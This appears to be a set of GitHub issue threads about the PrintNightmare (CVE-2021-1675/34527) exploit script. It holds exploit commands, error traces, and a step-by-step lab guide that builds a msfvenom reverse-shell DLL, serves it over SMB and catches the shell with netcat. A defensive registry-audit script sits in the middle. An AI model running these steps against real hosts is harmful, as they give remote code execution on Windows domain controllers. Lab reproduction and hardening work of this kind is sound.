  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: unknown error code: 0x180


Windows Samba configuration is not working

mkdir C:\share
icacls C:\share\ /T /grant Anonymous` logon:r
icacls C:\share\ /T /grant Everyone:r
New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipes
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f

Reboot

This is not working on Windows 10; can you help me with this?

impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x20 - ERROR_SHARING_VIOLATION

Start SMB server with Impacket:
sudo examples/smbserver.py -smb2support -ts smb /xxx/PrintNightmare/smb

Run exploit:
python CVE-2021-1675.py -port 445 'xxx/xxx:xxx/@xxx' '\10.33.69.214\smb\nightmare.dll' 'C:\Windows\system32\spool\DRIVERS\x64\3\UNIDRV.DLL'


Exploit log:

[*] Connecting to ncacn_np:xxx[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\system32\spool\DRIVERS\x64\3\UNIDRV.DLL
[*] Executing \\10.33.69.214\smb\nightmare.dll
[*] Try 1...
Traceback (most recent call last):
  File "xxx/CVE-2021-1675-cube0x0/CVE-2021-1675.py", line 176, in <module>
    main(dce, pDriverPath, options.share)
  File "xxx/CVE-2021-1675-cube0x0/CVE-2021-1675.py", line 84, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "xxx/CVE-2021-1675-cube0x0/venv/lib/python3.9/site-packages/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "xxx/CVE-2021-1675-cube0x0/venv/lib/python3.9/site-packages/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x20 - ERROR_SHARING_VIOLATION - The process cannot access the file because it is being used by another process.

SMB log:

[2021-07-05 12:31:44] [*] Disconnecting Share(1:smb)
[2021-07-05 12:31:44] [*] Closing down connection (10.33.48.25,58737)
[2021-07-05 12:31:44] [*] Remaining connections []
[2021-07-05 12:31:48] [*] Incoming connection (10.33.48.25,57754)
[2021-07-05 12:31:48] [*] AUTHENTICATE_MESSAGE (\,xxx)
[2021-07-05 12:31:48] [*] User xxx\ authenticated successfully
[2021-07-05 12:31:48] [*] :::00::aaaaaaaaaaaaaaaa
[2021-07-05 12:31:49] [*] Connecting Share(1:smb)

Wireshark screenshot:
(screenshot: printnightmare-wireshark-share-mode-file-conflict)

Unimplemented dissector: SPOOLSS
Return code: Share mode on file conflict with open mode (0x00000020)

Is anyone familiar with this error?

dll not loaded but uploaded

(screenshot)

Currently the DLL is uploaded to the server but spoolsv.exe is not loading it.
Does anyone have a solution for this?

I can't get rpcdump.py to work.

Getting an error

Traceback (most recent call last):
  File "./rpcdump.py", line 23, in <module>
    from impacket.http import AUTH_NTLM
ImportError: No module named impacket.http

Followed install instructions exactly (kali). Google wasn't any help.

Python script executed with no error but nothing happens

Hello,
in my lab environment I set up a small private network with my Kali Linux (latest version), 192.168.145.128, with a Samba share correctly configured, and a Windows 10 x64 machine (192.168.145.1) where I would like to inject the malicious DLL (a classic reverse TCP shell), built by:

msfvenom -f dll -p windows/x64/shell_reverse_tcp LHOST=192.168.145.128 LPORT=443 -o /tmp/reverse.dll

I can ping each machine from the other.
The Print Spooler service is running on Windows and, from Windows, the Linux SMB share can be reached with no issues. The Linux machine does not have ufw installed and the iptables list is:

Chain INPUT (policy ACCEPT)
target     prot opt source               destination         

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination   

Then, I start a listener on Kali machine by using Metasploit:

msf5 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set PAYLOAD windows/x64/shell_reverse_tcp 
PAYLOAD => windows/x64/shell_reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.145.128
LHOST => 192.168.145.128
msf5 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.145.128:443

When I execute the CVE-2021-1675 python script, the output is:

kali@kali:~$ sudo python3.8 CVE-2021-1675.py myusername:[email protected] '\\192.168.145.128\smb\reverse.dll'
[*] Connecting to ncacn_np:192.168.145.1[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_c62e9f8067f98247\Amd64\UNIDRV.DLL
[*] Executing \\192.168.145.128\smb\reverse.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...
[*] Stage0: 0

But on the listener nothing happens. I don't think the .dll is caught by the Windows Antivirus because I inserted it in exclusion.

What could be the issue? How can I solve it?

Thank you

Repo renaming?

Hello,

After investigating about this exploit, I've seen that the vulnerability CVE-2021-1675 was fully patched with the June 2021 security update. If this exploit is still working it is because it is exploiting the CVE-2021-34527. Can you confirm it, please?

Sources:
https://nakedsecurity.sophos.com/2021/07/07/printnightmare-official-patch-is-out-update-now/
https://nakedsecurity.sophos.com/2021/07/16/more-printnightmare-we-told-you-not-to-turn-the-print-spooler-back-on/
https://www.tenable.com/blog/cve-2021-34527-microsoft-releases-out-of-band-patch-for-printnightmare-vulnerability-in-windows
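Whether a patched host is still exposed to CVE-2021-34527 comes down to the Point and Print policy values under `HKLM\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint`. The following is an added defender's check, not code from this repository or from any of the posters: it parses the text that `REG QUERY` prints for that key and reports whether non-administrator driver installation is still allowed with the warning and elevation prompts switched off. The sample `reg query` outputs are constructed, and treating an absent `RestrictDriverInstallationToAdministrators` as 0 is a conservative assumption noted in the code.

```python
"""Added example (not part of the repository): assess Point and Print
policy values from `reg query` output to tell whether the post-patch
hardening for CVE-2021-34527 is in place on a host.

Input is the text that
  REG QUERY "HKLM\\Software\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint"
prints; all sample outputs in this file are constructed, not captured.
"""
import re
from dataclasses import dataclass, field

POINT_AND_PRINT_KEY = (
    r"HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint"
)
# One value line of `reg query`: indented name, type, data.
_VALUE_RE = re.compile(r"^\s+(?P<name>\S+)\s+(?P<type>REG_[A-Z_]+)\s+(?P<data>\S+)\s*$")


def parse_point_and_print(reg_output: str) -> dict[str, int]:
    """Return {name: int} for REG_DWORD values listed under the PointAndPrint key.

    Lines belonging to other keys are ignored, so the output of a broader
    `reg query /s` can be passed in unchanged.
    """
    values: dict[str, int] = {}
    in_key = False
    for line in reg_output.splitlines():
        if line and not line[0].isspace():
            # Unindented line: a key path header.
            in_key = line.strip().lower() == POINT_AND_PRINT_KEY.lower()
            continue
        m = _VALUE_RE.match(line)
        if in_key and m and m.group("type") == "REG_DWORD":
            values[m.group("name")] = int(m.group("data"), 16)
    return values


@dataclass
class Assessment:
    restricted_to_admins: bool  # RestrictDriverInstallationToAdministrators == 1
    prompts_suppressed: bool    # NoWarningNoElevationOnInstall == 1 or UpdatePromptSettings != 0
    findings: list[str] = field(default_factory=list)

    @property
    def exposed(self) -> bool:
        """Non-admin driver installs are allowed and the warning/elevation
        prompts that would normally stop them are turned off."""
        return not self.restricted_to_admins and self.prompts_suppressed


def assess(values: dict[str, int]) -> Assessment:
    """Evaluate the parsed policy values.

    Assumption: an absent RestrictDriverInstallationToAdministrators is
    treated as 0 (not restricted). Hosts with the August 2021 update and
    later default to 1 when the value is absent, so an absent value is
    reported as a finding rather than silently trusted either way.
    """
    findings: list[str] = []
    restrict = values.get("RestrictDriverInstallationToAdministrators")
    if restrict is None:
        findings.append("RestrictDriverInstallationToAdministrators not set; "
                        "effective default depends on patch level")
    elif restrict == 0:
        findings.append("RestrictDriverInstallationToAdministrators=0: "
                        "non-administrators may install printer drivers")

    no_warn = values.get("NoWarningNoElevationOnInstall", 0)
    update_prompt = values.get("UpdatePromptSettings", 0)
    if no_warn == 1:
        findings.append("NoWarningNoElevationOnInstall=1: install warning and "
                        "elevation prompt disabled")
    if update_prompt != 0:
        findings.append(f"UpdatePromptSettings={update_prompt}: driver update "
                        "prompt reduced or disabled")

    return Assessment(
        restricted_to_admins=(restrict == 1),
        prompts_suppressed=(no_warn == 1 or update_prompt != 0),
        findings=findings,
    )


# Constructed samples (not captured from a real host).
SAMPLE_WEAK = """\
HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint
    RestrictDriverInstallationToAdministrators    REG_DWORD    0x0
    NoWarningNoElevationOnInstall    REG_DWORD    0x1
"""

SAMPLE_HARDENED = """\
HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint
    RestrictDriverInstallationToAdministrators    REG_DWORD    0x1
    NoWarningNoElevationOnInstall    REG_DWORD    0x0
    UpdatePromptSettings    REG_DWORD    0x0
"""

if __name__ == "__main__":
    for label, sample in (("weak", SAMPLE_WEAK), ("hardened", SAMPLE_HARDENED)):
        a = assess(parse_point_and_print(sample))
        print(f"{label}: exposed={a.exposed}")
        for finding in a.findings:
            print("  -", finding)
```

Feed it the saved output of `reg query` from the host under review; `exposed` is only true when both conditions hold, while `findings` lists each weak or unset value on its own so a host with `RestrictDriverInstallationToAdministrators=1` but prompts still disabled is surfaced as worth cleaning up rather than reported as fully exposed.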

SMB SessionError: STATUS_PIPE_CLOSING(The specified named pipe is in the closing state.)

──(king㉿Kali)-[~/CVE-2021-1675]
└─$ sudo python3 CVE-2021-1675.py genyu.com/wxh:[email protected] '\\192.168.175.132\smb\rever.dll'

[*] Connecting to ncacn_np:192.168.175.133[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\192.168.175.132\smb\rever.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
Traceback (most recent call last):
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 568, in writeFile
    return self._SMBConnection.writeFile(treeId, fileId, data, offset)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1650, in writeFile
    written = self.write(treeId, fileId, writeData, writeOffset, len(writeData))
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1358, in write
    if ans.isValidAnswer(STATUS_SUCCESS):
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3structs.py", line 454, in isValidAnswer
    raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_PIPE_CLOSING(The specified named pipe is in the closing state.)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/king/CVE-2021-1675/CVE-2021-1675.py", line 190, in <module>
    main(dce, pDriverPath, options.share)
  File "/home/king/CVE-2021-1675/CVE-2021-1675.py", line 93, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 856, in request
    self.call(request.opnum, request, uuid)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 845, in call
    return self.send(DCERPC_RawCall(function, body.getData(), uuid))
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1298, in send
    self._transport_send(data)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1235, in _transport_send
    self._transport.send(rpc_packet.get_packet(), forceWriteAndx = forceWriteAndx, forceRecv = forceRecv)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/transport.py", line 535, in send
    self.__smb_connection.writeFile(self.__tid, self.__handle, data)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 570, in writeFile
    raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: STATUS_PIPE_CLOSING(The specified named pipe is in the closing state.)

PLEASE HELP ME!!!!

SMB SessionError: STATUS_PIPE_BROKEN(The pipe operation has failed because the other end of the pipe has been closed.)

sudo python3 CVE-2021-1675.py test.local/chen:[email protected] '\\192.168.121.128\smb\reverse.dll'
[*] Connecting to ncacn_np:192.168.121.136[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_ce3301b66255a0fb\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\192.168.121.128\smb\reverse.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...
Traceback (most recent call last):
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 597, in readFile
    bytesRead = self._SMBConnection.read_andx(treeId, fileId, offset, toRead)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1975, in read_andx
    return self.read(tid, fid, offset, max_size, wait_answer)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1312, in read
    if ans.isValidAnswer(STATUS_SUCCESS):
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3structs.py", line 454, in isValidAnswer
    raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_PIPE_BROKEN(The pipe operation has failed because the other end of the pipe has been closed.)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/kali/CVE-2021-1675.py", line 192, in <module>
    main(dce, pDriverPath, options.share)
  File "/home/kali/CVE-2021-1675.py", line 93, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 857, in request
    answer = self.recv()
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1308, in recv
    response_data = self._transport.recv(forceRecv, count=MSRPCRespHeader._SIZE)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/transport.py", line 547, in recv
    return self.__smb_connection.readFile(self.__tid, self.__handle)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 603, in readFile
    raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: STATUS_PIPE_BROKEN(The pipe operation has failed because the other end of the pipe has been closed.)

How to Reproduce (Virtual Environment):

This is how I was able to reproduce the exploit in a virtual environment:

  1. The best practice is to create a Python virtual environment:
     • python3 -m venv PrintNightmare
     • source PrintNightmare/bin/activate

  2. Clone the repo and install the custom Impacket version:
     • git clone https://github.com/cube0x0/CVE-2021-1675.git
     • git clone https://github.com/cube0x0/impacket
     • cd impacket
     • python3 ./setup.py install

  3. Set up the SMB share:
     • copy the original smb.conf file and create a backup file:
       cp /etc/samba/smb.conf /etc/samba/smb.conf.bak
     • now change smb.conf to this new configuration file:

       [global]
       map to guest = Bad User
       server role = standalone server
       usershare allow guests = yes
       idmap config * : backend = tdb
       smb ports = 445

       [smb]
       comment = Samba
       path = /tmp/
       guest ok = yes
       read only = no
       browsable = yes
       force user = nobody

     • Spin up the SMB share:
       impacket-smbserver smb /tmp/

     In case you have some problems with the SMB share, try to use the built-in smbd service:
       service smbd start

  4. Payload creation:
     • Create a reverse shell payload as a DLL:
       msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=<YOUR IP> LPORT=<PORT TO LISTEN> -f dll -o /tmp/rev.dll

  5. Windows environment:
     • you need to create a DC with Active Directory.
     • create a low privilege user
     • create a Windows 10 client and join it to the domain
     • log in to the Win10 machine with the new user

  6. Set up a listener:
     • nc -lnvp 9001

  7. Run the exploit:
     • python3 CVE-2021-1675.py <FQDN>/<USER_Name>:<PASSWORD>@<DC IP> '\\<ATTACKER_IP>\smb\rev.dll'

  8. ENJOY your SHELL =)

[Screenshot 2021-07-02 144836]

Machines:

  • Attacker: Kali Linux
  • DC: Server 2016
  • Client: Win10
